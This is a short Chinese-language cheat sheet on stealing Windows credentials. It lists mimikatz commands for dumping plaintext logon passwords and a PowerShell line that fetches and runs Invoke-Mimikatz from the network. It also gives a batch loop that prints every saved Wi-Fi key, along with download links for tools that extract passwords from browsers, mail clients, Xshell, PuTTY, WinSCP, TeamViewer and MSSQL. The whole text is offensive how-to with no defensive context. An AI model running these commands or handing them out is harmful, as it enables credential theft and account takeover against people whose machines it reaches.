Windows登录凭证窃取小记
1、Windows本地密码Hash
破解方式一:在线破解
http://cmd5.com
https://www.objectif-securite.ch/ophcrack
破解方式二:mimikatz
github下载地址:https://github.com/gentilkiwi/mimikatz
提取Windows系统的明文密码命令:
privilege::debug
sekurlsa::logonpasswords
破解方式三:Powershell+mimikatz
利用poweshell来调用mimikatz抓取系统内的明文密码
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
2、抓取浏览器密码
LaZagne:提取浏览器所保存的密码
github下载地址:https://github.com/AlessandroZ/LaZagne
3、第三方运维工具托管密码解密
Linux运维工具,如Putty、xshell等,RDP管理工具,Remote Desktop Organizer,远控软件:Teamviewer
xshell 密码解密工具:
https://github.com/dzxs/Xdecrypt
提取WinSCP,PuTTY等保存的会话信息:
https://github.com/Arvanaghi/SessionGopher
从内存中提取TeamViewer密码的工具:
https://github.com/attackercan/teamviewer-dumper
4、获取电脑wifi密码
#查看电脑连接过的所有wifi
netsh wlan show profiles
#查看wifi信号为aaa的密码
netsh wlan show profiles name="aaa" key="clear"
#CMD一键获取 所有连接过的WIFI密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
5、Windows密码提取工具合集
IE浏览器提取密码工具:
https://www.nirsoft.net/toolsdownload/iepv.zip
Firefox 浏览器密码提取工具:
https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip
Chrome 浏览器密码提取工具:
https://www.nirsoft.net/toolsdownload/chromepass.zip
邮箱密码提取工具:
https://www.nirsoft.net/toolsdownload/mailpv.zip
MSSQL凭据密码获取工具:
http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip